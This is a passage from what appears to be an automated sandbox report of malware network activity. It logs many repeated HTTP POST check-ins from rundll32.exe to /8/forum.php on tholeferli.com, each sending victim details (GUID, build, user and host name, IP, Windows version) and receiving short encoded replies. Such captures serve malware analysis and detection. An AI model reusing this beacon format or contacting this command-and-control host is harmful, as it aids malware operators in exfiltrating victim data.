                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:17.231761932 CEST458INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQAZJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                146192.168.2.2249313194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:17.513257980 CEST459OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:17.669996977 CEST459INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMVENARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                147192.168.2.2249314194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:17.960793972 CEST460OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:18.116715908 CEST460INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZAZAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                148192.168.2.2249315194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:18.387399912 CEST461OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:18.543351889 CEST461INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTHSGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                149192.168.2.2249316194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:18.980448008 CEST462OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:19.136413097 CEST463INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZBYAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                15192.168.2.2249182194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:09.646503925 CEST312OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:09.817370892 CEST312INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:09 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                150192.168.2.2249317194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:19.737467051 CEST463OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:19.904759884 CEST464INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHZASARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                151192.168.2.2249318194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:20.199851990 CEST465OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:20.367650032 CEST465INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZFUAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                152192.168.2.2249319194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:20.678678036 CEST466OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:20.848067045 CEST466INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAAZZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                153192.168.2.2249320194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:21.566584110 CEST467OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:21.733494997 CEST467INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:21 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBNMYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                154192.168.2.2249321194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:22.008101940 CEST468OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:23.167417049 CEST468INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJKPQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                155192.168.2.2249322194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:23.446151018 CEST469OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:23.613425970 CEST469INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTKPGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                156192.168.2.2249323194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:23.913350105 CEST470OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:24.082932949 CEST470INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 43 58 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGCXTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                157192.168.2.2249324194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:24.359683037 CEST471OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:24.515281916 CEST472INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZQJAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                158192.168.2.2249325194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:24.782763958 CEST472OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:24.938327074 CEST473INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGZATARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                159192.168.2.2249326194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:25.219157934 CEST473OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:25.374665976 CEST474INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 51 4a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNQJMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                16192.168.2.2249183194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:10.107105017 CEST313OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:10.265167952 CEST313INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:10 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 48 53 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQHSJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                160192.168.2.2249327194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:25.640275955 CEST475OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:25.797365904 CEST475INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 46 55 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBFUYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                161192.168.2.2249328194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:26.086143970 CEST476OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
